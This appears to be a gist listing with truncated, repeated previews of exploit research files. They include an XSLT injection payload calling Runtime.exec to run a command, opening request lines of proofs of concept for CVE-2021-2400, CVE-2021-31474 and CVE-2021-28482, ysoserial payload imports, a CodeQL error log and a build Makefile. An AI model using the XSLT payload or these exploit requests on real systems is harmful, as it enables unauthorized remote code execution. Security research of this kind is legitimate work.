testanull

## select.xslt
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="&lt;init&gt;"/>

## asdklajsdlkajsdlkajsdakjsdhalskdasdioasiodaklsd.py
import requests
import random
import string
import sys
import time
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):

## PoC_CVE-2021-2400.txt
POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
Host: 192.168.139.212
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1317

<?xml version="1.0"?>
<soap-env:Envelope

## JavaCharStream.java
public class JavaCharStream
{
public char readChar() throws java.io.IOException
  {
   //truncated
              if ((buffer[bufpos] = c = ReadByte()) != '\\')
              {
                 UpdateLineColumn(c);
                 // found a non-backslash char.
                 if ((c == 'u') && ((backSlashCnt & 1) == 1))

## TomcatEchoInjectOpenAM.java
package ysoserial.payloads;

import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
import org.apache.catalina.connector.Response;
import org.apache.catalina.connector.ResponseFacade;
import org.apache.catalina.core.ApplicationFilterChain;

## PoC_CVE-2021–31474.json
POST /api/Action/TestAction HTTP/1.1
Host: <target>
Content-Length: 3978
Accept: application/json, text/javascript, */*; q=0.01
X-XSRF-TOKEN: <token>
X-Requested-With: XMLHttpRequest
ViewLimitationID: 0
User-Agent: Mozilla/5.0
Content-Type: application/json; charset=UTF-8
Cookie: <cookie>

## PoC_CVE-2021-28482.py
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)

## Test0.java
import flex.messaging.io.SerializationContext;
import flex.messaging.io.amf.*;
import org.apache.commons.collections.LRUMap;

import java.io.*;

public class Test0 {
    public static void main(String[] args) throws Exception{
        LRUMap lruMap = new LRUMap();
        byte[] ser = serialize(lruMap);

## codeql_err.log
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s).
PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache
Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
Failed [1/1] D:\Research\sem

## Makefile.iot
export CONFIG_BCM_CPU_ARCH_NAME=mips32
export PROFILE=96838GWO
dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf
apt-get install libacl1-dev  libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison

git clone https://github.com/weihutaisui/BCM/
find . -iname "*.pl" -exec chmod +x {} \;
find . -iname "*.sh" -exec chmod +x {} \;
find . -iname "configure" -exec chmod +x {} \;
find . -iname "gen_dt_bindings" -exec chmod +x {} \;
	<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
	<xsl:template>
	<!-- #113 Methodref: java/lang/Runtime.getRuntime:()Ljava/lang/Runtime; -->
	<!-- #119 Methodref: java/lang/Runtime.exec:(Ljava/lang/String;)Ljava/lang/Process; -->
	<!-- #114 Utf8: open -a calculator -->
	<!-- #115 String: touch /tmp/pwn -->
	<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'open -a calculator')" xmlns:Runtime="java.lang.Runtime"/>
	<xsl:value-of select="at:new()" xmlns:at="org.apache.xalan.xsltc.runtime.AbstractTranslet"/>
	<!-- #132 Utf8: <init> -->
	<AAA select="<init>"/>
	import requests
	import random
	import string
	import sys
	import time
	import requests
	import urllib3
	urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

	def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
	POST /xmlpserver/ReportTemplateService.xls HTTP/1.1
	Host: 192.168.139.212
	User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
	Connection: close
	Upgrade-Insecure-Requests: 1
	Content-Type: text/xml
	Content-Length: 1317

	<?xml version="1.0"?>
	<soap-env:Envelope
	public class JavaCharStream
	{
	public char readChar() throws java.io.IOException
	{
	//truncated
	if ((buffer[bufpos] = c = ReadByte()) != '\\')
	{
	UpdateLineColumn(c);
	// found a non-backslash char.
	if ((c == 'u') && ((backSlashCnt & 1) == 1))
	package ysoserial.payloads;

	import com.sun.org.apache.xalan.internal.xsltc.DOM;
	import com.sun.org.apache.xalan.internal.xsltc.TransletException;
	import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
	import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
	import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
	import org.apache.catalina.connector.Response;
	import org.apache.catalina.connector.ResponseFacade;
	import org.apache.catalina.core.ApplicationFilterChain;
	POST /api/Action/TestAction HTTP/1.1
	Host: <target>
	Content-Length: 3978
	Accept: application/json, text/javascript, /; q=0.01
	X-XSRF-TOKEN: <token>
	X-Requested-With: XMLHttpRequest
	ViewLimitationID: 0
	User-Agent: Mozilla/5.0
	Content-Type: application/json; charset=UTF-8
	Cookie: <cookie>
	import flex.messaging.io.SerializationContext;
	import flex.messaging.io.amf.*;
	import org.apache.commons.collections.LRUMap;

	import java.io.*;

	public class Test0 {
	public static void main(String[] args) throws Exception{
	LRUMap lruMap = new LRUMap();
	byte[] ser = serialize(lruMap);
	PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql
	Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
	ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
	Failed [1/1] D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql (3 s).
	PS D:\Research\semmle\vscode-codeql-starter\ql> codeql query compile ../ql/cpp/ql/src/Security/CWE/CWE-079/CgiXss.ql --no-default-compilation-cache
	Compiling query plan for D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\Security\CWE\CWE-079\CgiXss.ql.
	ERROR: extraneous input 'cached' expecting one of: 'or', ';' (D:\Research\semmle\vscode-codeql-starter\ql\cpp\ql\src\semmle\code\cpp\ir\implementation\aliased_ssa\internal\SSAConstruction.qll:45,3-9)
	Failed [1/1] D:\Research\sem
	export CONFIG_BCM_CPU_ARCH_NAME=mips32
	export PROFILE=96838GWO
	dpkg --add-architecture i386 && apt update && apt install -y locales nano git make autoconf gcc g++ xxd libz-dev wget file gcc-multilib g++-multilib autoconf
	apt-get install libacl1-dev libuuid1:i386 uuid-dev uuid-dev:i386 zlib1g-dev zlib1g-dev:i386 liblzo2-dev liblzo2-dev:i386 pkg-config flex bison

	git clone https://github.com/weihutaisui/BCM/
	find . -iname "*.pl" -exec chmod +x {} \;
	find . -iname "*.sh" -exec chmod +x {} \;
	find . -iname "configure" -exec chmod +x {} \;
	find . -iname "gen_dt_bindings" -exec chmod +x {} \;